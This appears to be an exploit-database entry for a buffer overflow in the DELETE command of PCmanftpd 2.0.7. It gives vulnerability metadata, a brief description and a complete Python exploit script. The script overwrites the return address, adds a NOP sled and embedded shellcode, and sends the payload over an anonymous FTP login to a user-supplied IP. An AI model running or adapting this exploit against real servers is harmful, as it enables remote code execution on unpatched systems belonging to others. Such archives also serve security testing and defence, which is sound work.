PCmanftpd_delete_command_remotecode_exploit_Win7_x64_HUN_ENG

vendor:

PCmanftpd

by:

Greg Priest

9,3

CVSS

HIGH

Remote Code Execution

119

CWE

Product Name: PCmanftpd

Affected Version From: PCmanftpd 2.0.7

Affected Version To: PCmanftpd 2.0.7

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 Enterprise x64 HUN/ENG

2016

PCmanftpd_delete_command_remotecode_exploit_Win7_x64_HUN_ENG

This exploit is a buffer overflow vulnerability in the delete command of PCmanftpd 2.0.7. The vulnerability is triggered when a malicious user sends an overly long string to the delete command. This causes a buffer overflow, overwriting the EIP and allowing the execution of arbitrary code. The exploit was tested on Windows 7 Enterprise x64 HUN/ENG.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

from ftplib import FTP

print '''
                ##############################################
                #    Created: ScrR1pTK1dd13                  #
                #    Name: Greg Priest                       #
                #    Mail: ScrR1pTK1dd13.slammer@gmail.com   # 
                ##############################################

# Exploit Title: PCmanftpd_delete_command_remotecode_exploit_Win7_x64_HUN_ENG
# Date: 2016.10.31
# Exploit Author: Greg Priest
# Version: Pcmanftpd 2.0.7
# Tested on: Windows 7 Enterprise x64 HUN/ENG
'''
ftp_ip = raw_input("FTP server IP:")
overflow = 'A' * 2005 
eip = '\xCA\x96\xC9\x76' + '\x90' * 10
shellcode=(
"\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" +
"\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" +
"\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" +
"\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" +
"\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" +
"\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" +
"\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" +
"\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" +
"\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" +
"\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" +
"\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" +
"\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" +
"\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" +
"\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" +
"\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" +
"\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" +
"\xa5\x59\x50")
remotecode = overflow + eip + shellcode
ftp = FTP(ftp_ip)
ftp.login('anonymous', 'hacker@hacker.net')
print ftp.login
print '''
Successfull Exploitation!
'''
FTP.delete(ftp, remotecode)